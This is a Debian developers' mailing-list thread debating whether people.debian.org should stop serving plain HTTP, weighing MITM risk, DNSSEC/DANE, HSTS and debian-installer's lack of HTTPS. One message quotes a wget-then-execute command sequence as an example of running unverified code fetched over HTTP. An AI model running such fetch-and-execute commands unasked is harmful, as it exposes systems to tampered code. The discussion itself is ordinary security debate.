* Jacob Appelbaum ja...@appelbaum.net, 2014-07-21, 13:09: I'm also curious - is there a Debian developer who will not use HTTPS but does use SSH to access servers? Very unlikely, with or without the “but …” part. (But I'm afraid I don't understand what point you're trying to make.) Is Debian still offering telnet services too? I don't think so. What other unsafe protocols are standard and in use? Off the top of my head: e-mail, FTP, LDAP, IRC. (assuming that “unsafe” means “with no (or nonmandatory) encryption”) -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140721165251.ga4...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Peter Palfrader wea...@debian.org, 2014-07-20, 12:07: we have been moving towards https for most services over the last 12 months. Is that intentional that the http-https redirect for bugs.d.o is only temporary (302)? Should we update devscripts and python-debianbts to use HTTPS for accessing this host? Do you plan to enable HTTPS on incoming.d.o and lintian.d.o? -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140721174418.ga9...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zaterdag 19 juli 2014 22:54:47 schreef u: ]] Wouter Verhelst Op zondag 13 juli 2014 22:13:10 schreef Martin Zobel-Helas: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Why? Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today. Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days. It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed. Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks True, but debian-installer simply does not support any signed/encrypted preseeding. Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. unless you do extra checking against checksums (something d-i doesn't support, AFAIK). Also true. Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, I while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it. Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1537194.az5tuca...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst Op zaterdag 19 juli 2014 22:54:47 schreef u: ]] Wouter Verhelst Op zondag 13 juli 2014 22:13:10 schreef Martin Zobel-Helas: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Why? Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today. Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days. I don't see a big difference between reading mail in pine, which people did using telnet and reading mail in their browser over HTTP. Or IRC and twitteresque services. (I wouldn't call things like mail clients and social media control interfaces either.) It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed. Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs? We could do something like that, where if you absolutely must use HTTP, you can, but it's more annoying and tedious than the better alternative. Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks True, but debian-installer simply does not support any signed/encrypted preseeding. Nod; as an aside, having the ability to do preseed=http(s)://url/ preseed_sha256=$sha256 would be pretty useful. Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection. Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? To pick a random example off a web page: http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/ wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to sed -i 's/lenny/wheezy/' add-firmware-to chmod +x add-firmware-to ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy -- Tollef Fog Heen UNIX is user friendly, it's just picky about who its friends are -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/87wqb8edck@xoog.err.no
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. But that implies that the attacker has access to private keys, and in this case you are so screwed. The possibility of stolen private keys should not be argument for not implementing security. There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? Pervasive monitoring. Really we should introduce encryption *everywhere*. O. -- Ondřej Surý ond...@sury.org Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1405841035.16130.143560421.61491...@webmail.messagingengine.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi, Ondřej Surý: Pervasive monitoring. In and of itself, if you only access publicly-availble files, that's not a threat. Really we should introduce encryption *everywhere*. This change does not introduce encryption. It disables the option not to use encryption. I can accept that e.g. if you're using basic-auth or similar cleartext password schemes on the link. Otherwise, not so much. In other words: please add HTTPS capabilities to d-i before you do that. -- -- Matthias Urlichs -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720083823.gd15...@smurf.noris.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 09:23:55 schreef u: On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. But that implies that the attacker has access to private keys, and in this case you are so screwed. My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to. The possibility of stolen private keys should not be argument for not implementing security. I'm not against implementing security -- I'm against forcing https where it makes no sense. There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? Pervasive monitoring. Really we should introduce encryption *everywhere*. I realize that in these days of Snowden and similar things it is fashionable to say that there's someone snooping every connection everywhere, but I don't think that's a) a very strong argument, or b) blocked by use of HTTPS (if the pervasive monitoring kind of people like the NSA want to, they'll just subpoena those who have access to the secret data and get what they want). Additionally, and again, I'm not against allowing HTTPS for those who want to make pervasive monitoring harder--I'm against disabling plain HTTP just for the sake of it. Sure, enable HTTPS, and yeah, sure, enable HSTS too. But disabling HTTP? That doesn't serve any useful purpose. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1915517.jyrk2gy...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 08:47:07 schreef Tollef Fog Heen: ]] Wouter Verhelst Op zaterdag 19 juli 2014 22:54:47 schreef u: ]] Wouter Verhelst Op zondag 13 juli 2014 22:13:10 schreef Martin Zobel-Helas: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Why? Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today. Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days. I don't see a big difference between reading mail in pine, which people did using telnet and reading mail in their browser over HTTP. Or IRC and twitteresque services. Oh sure, I agree that in those cases it makes perfect sense to disable plain HTTP. But that's not what this is. AFAIK, people.debian.org does not allow running server-side HTTP scripts (and even if it does, I think that's a bad idea and we should disable it ASAP). As such, people.debian.org is not an interface for reading mail in your browser over HTTP, or doing IRC, or whatnot. So that argument simply doesn't apply. Instead, people.d.o is a place to allow downloads of files. Period. Sometimes it should be possible to verify that these files have not been tampered with. With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring. (I wouldn't call things like mail clients and social media control interfaces either.) Well, I would, but that's just semantics, and so has little relevance in this discussion. It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed. Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs? We could do something like that, where if you absolutely must use HTTP, you can, but it's more annoying and tedious than the better alternative. I suppose that could work, although it might make HSTS fail (but I must admit I don't understand HSTS in detail). [...] Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection. If you can MITM people.debian.org, you've already MITM'ed a DNSSEC-secured domain. Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? To pick a random example off a web page: http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/ wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to sed -i 's/lenny/wheezy/' add-firmware-to chmod +x add-firmware-to ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy The problem here is not the idea that someone might MITM people.debian.org and provide something useless. The problem is a culture of people who run random code off the web without checking what it does. That ghantoos.org thing might refer to people.deb1an.org instead which contains nothing but malware; if you download and run code off the internet without checking it, you've already lost. This isn't very special in that regard, and that's not something you can fix by forcing HTTPS on people. Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS. Again, I support enabling HTTPS, and I support making it the default if possible. I just don't think disabling plain HTTP is a good idea. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 09:23:55AM +0200, Ondřej Surý wrote: On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? Pervasive monitoring. Really we should introduce encryption *everywhere*. If this were DSA's position, I would disagree with it, but I would understand where they're coming from. But DSA has *not* said that this is the reason for enforcing use of a protocol with significantly higher overhead. I do think that if DSA are going to enforce such a policy, they should be able to explain why. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Tollef Fog Heen tfh...@err.no, 2014-07-20, 08:47: Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs? No need to be condescending. :-( Also, I wouldn't say “insecure”, which might be vague in this context. My proposal: http://nohttps.people.debian.org/~user/file -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720100359.ga6...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 20 July 2014 10:07, Wouter Verhelst w...@uter.be wrote: With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring. Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing. Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected. Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser. Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. In this scenario, you gain that if the adversary wants to see what you're doing with your HTTPS connection, they need to do something potentially noticable like change the SSL certificate being offered. Again, I support enabling HTTPS, and I support making it the default if possible. I just don't think disabling plain HTTP is a good idea. Annoyingly, unless d-i supports SSL (or runs Tor), taking this very sensible move is rather inconvenient. Another potential use for plain HTTP would be if we installed a Tor hidden service on paradis, and published the address in a GPG-signed message. You would avoid the CA cartel, and have some assurance of privacy. Kind regards, -- Tim Retout dioc...@debian.org -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/cadc0ge-agleh5eyfkm13mvfxhmumdpamcamofazbzqgashm...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014 10:45:10 +0200, Wouter Verhelst w...@uter.be wrote: Op zondag 20 juli 2014 09:23:55 schreef u: On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. But that implies that the attacker has access to private keys, and in this case you are so screwed. My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to. I might me missing something, and I admit not having read the entire thread, but how would they have access to private key material? _My_ GPG key has never been near people.debian.org, and I suspect that key ring management would (rightfully!) promptly kick any public key whose private key was found on p.d.o out of the keyring. Greetings Marc -- -- !! No courtesy copies, please !! - Marc Haber |Questions are the | Mailadresse im Header Mannheim, Germany | Beginning of Wisdom | http://www.zugschlus.de/ Nordisch by Nature | Lt. Worf, TNG Rightful Heir | Fon: *49 621 72739834 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1x8nzn-0007a3...@swivel.zugschlus.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Steve Langasek wrote: On Sun, Jul 20, 2014 at 09:23:55AM +0200, Ondřej Surý wrote: On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? Pervasive monitoring. Really we should introduce encryption *everywhere*. If this were DSA's position, I would disagree with it, but I would understand where they're coming from. But DSA has *not* said that this is the reason for enforcing use of a protocol with significantly higher overhead. I do think that if DSA are going to enforce such a policy, they should be able to explain why. What Ondřej said -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720100121.gi...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Ondřej Surý wrote: Pervasive monitoring. Really we should introduce encryption *everywhere*. And indeed we have been moving towards https for most services over the last 12 months. www is still not done, due to unfortunate push-bash by the service owners, but most others have migrated quite successfully. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720100747.gj...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
At Sun, 20 Jul 2014 11:07:16 +0200, Wouter Verhelst wrote: Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS. I don't really follow that. A validating DNS resolver only makes sure you connect to the right IP address. DANE can specifiy the certificate to use for HTTPS, but you can't forward HTTP requests to HTTPS with DANE as far as I know. In the case of HTTP a MITM attack can send a fake response to the HTTP request without the need for any key material/certificates or need to fake DNSSEC. For HTTPS it would need to have a certificate for people.debian.org that the client trusts. Kind regards, Jeroen Dekkers -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/87silwjo6w.wl%jer...@dekkers.ch
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 11:06:00 schreef Tim Retout: On 20 July 2014 10:07, Wouter Verhelst w...@uter.be wrote: With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring. Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing. Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected. Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser. These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. There might be a reason why a user would want to use encryption does not negate there might be a reason why a user would *not* want to use encryption. I'm claiming the reasons as in the latter exist; one (and not the least) of which is that downloading files off people.debian.org from d-i preseeding happens today, is a valid use of that service, and cannot be done if HTTP is disabled. If you think there aren't such valid reasons, you either need to show me why my claim is wrong, or why the costs to doing so outweigh the benefits. So far I haven't seen anyone do that. [...] -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1716734.flo03rq...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 12:53:59 schreef Jeroen Dekkers: At Sun, 20 Jul 2014 11:07:16 +0200, Wouter Verhelst wrote: Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS. I don't really follow that. A validating DNS resolver only makes sure you connect to the right IP address. DANE can specifiy the certificate to use for HTTPS, but you can't forward HTTP requests to HTTPS with DANE as far as I know. If someone manages to break DNSSEC in such a way that they can redirect your DNS requests to an IP address of their choosing, they can also replace DANE records out from under your feet. But I agree that the argument is somewhat weak. It's also not my core argument. In the case of HTTP a MITM attack can send a fake response to the HTTP request without the need for any key material/certificates or need to fake DNSSEC. For HTTPS it would need to have a certificate for people.debian.org that the client trusts. True. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/4767887.t6llxl5...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, July 20, 2014 08:15, Wouter Verhelst wrote: Op zaterdag 19 juli 2014 22:54:47 schreef u: Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks True, but debian-installer simply does not support any signed/encrypted preseeding. If you insist on using http, you can also just host your preseed files on http://grep.be. I don't see why DSA should wait to implement improvements to Debian services while there are perfect alternatives available to suit your use case. Hosting stuff on people.debian.org gives it some air of legitimacy, this is approved by people associated with Debian. It only makes sense to me that if we want to provide a service that associates content with Debian, we make that service as secure and trustworthy as possible. Thijs -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/862e3205c73028bb44e472d667cd80d6.squir...@aphrodite.kinkhorst.nl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 11:38:13 schreef Marc Haber: On Sun, 20 Jul 2014 10:45:10 +0200, Wouter Verhelst w...@uter.be wrote: Op zondag 20 juli 2014 09:23:55 schreef u: On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote: Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. But that implies that the attacker has access to private keys, and in this case you are so screwed. My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to. I might me missing something, and I admit not having read the entire thread, but how would they have access to private key material? Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/15798403.9o3vuy3...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014 13:21:03 +0200, Wouter Verhelst w...@uter.be wrote: Op zondag 20 juli 2014 11:38:13 schreef Marc Haber: I might me missing something, and I admit not having read the entire thread, but how would they have access to private key material? Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys. Why would material of that kind (short of the SSL private key for the https server) be on p.d.o? Greetings Marc -- -- !! No courtesy copies, please !! - Marc Haber |Questions are the | Mailadresse im Header Mannheim, Germany | Beginning of Wisdom | http://www.zugschlus.de/ Nordisch by Nature | Lt. Worf, TNG Rightful Heir | Fon: *49 621 72739834 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1x8pij-0008ty...@swivel.zugschlus.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst AFAIK, people.debian.org does not allow running server-side HTTP scripts (and even if it does, I think that's a bad idea and we should disable it ASAP). As such, people.debian.org is not an interface for reading mail in your browser over HTTP, or doing IRC, or whatnot. So that argument simply doesn't apply. There is no need for server-side HTTP scripts to run IRC in your browser. http://glowing-bear.github.io/glowing-bear/ talks to weechat, for instance. Instead, people.d.o is a place to allow downloads of files. Period. That's not the only thing people use it for, though. They use it for hosting web pages, their blog and so on. Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much. Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection. If you can MITM people.debian.org, you've already MITM'ed a DNSSEC-secured domain. I see there's some confusion here. I'm talking about a TCP level MITM attack, not a DNS hijacking attack, which seems to be what you're talking about. Hijacking TCP is trivial and happens (intentionally and by mistake) very, very often. Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. So name one? To pick a random example off a web page: http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/ wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to sed -i 's/lenny/wheezy/' add-firmware-to chmod +x add-firmware-to ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy The problem here is not the idea that someone might MITM people.debian.org and provide something useless. The problem is a culture of people who run random code off the web without checking what it does. That is also a problem, yes. Using HTTP makes it worse than if it was using HTTPS. -- Tollef Fog Heen UNIX is user friendly, it's just picky about who its friends are -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/m2pph0qmq6@rahvafeir.err.no
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720115220.gk...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 10:38:23AM +0200, Matthias Urlichs wrote: Pervasive monitoring. In and of itself, if you only access publicly-availble files, that's not a threat. 1 Security service has unknown exploit. 2 Pervasive monitoring sees you install a package from somewhere over HTTP. 3 Attack is automated in a targeted fashion. I don't see that this is beyond the realm of possibility. This is really only a reason for having HTTPS as default, not excluding those who can't use HTTPS for legal, technical or other reasons. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpeX09WD6eKd.pgp Description: PGP signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 12:03:59PM +0200, Jakub Wilk wrote: My proposal: http://nohttps.people.debian.org/~user/file This is similar to my proposal[1], using a seperate VHOST that would allow HTTP access. It's clear in the URL what is going on, and most people will be using HTTPS but there are very good reasons for not using HTTPS. You just might not have thought of them yet. [1]: https://lists.debian.org/debian-devel/2014/07/msg00480.html The main one is that there are places in the world you just can't use HTTPS for legal reasons and the second one being that there is hardware that just can't handle HTTPS. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpL8mQaEmOf4.pgp Description: PGP signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 01:52:20PM +0200, Peter Palfrader wrote: On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. See: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security It sends a header to tell you you should be using HTTPS. I am happy however to just use a seperate VHOST for non-HTTPS access. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpWSnHA5Gj2c.pgp Description: PGP signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
